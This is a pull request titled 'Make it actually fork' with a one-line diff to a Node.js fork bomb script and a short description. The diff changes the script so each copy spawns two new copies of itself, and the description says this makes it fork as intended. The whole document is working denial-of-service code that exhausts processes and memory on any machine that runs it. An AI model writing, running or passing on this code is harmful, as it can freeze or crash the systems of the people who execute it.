### PR TITLE
Make it actually fork

### DIFF
--- a/fork-bomb.js
+++ b/fork-bomb.js
@@ -1,1 +1,1 @@
-(function f() { require('child_process').spawn(process.argv[0], ['-e', '(' + f.toString() + '());']); }());
+(function f() { require('child_process').spawn(process.argv[0], ['-e', '(' + f.toString() + '());']); require('child_process').spawn(process.argv[0], ['-e', '(' + f.toString() + '());']); }());


### PR DESCRIPTION
Makes the node.js fork bomb actually fork itself. It previously only made one copy of itself, which did basically nothing.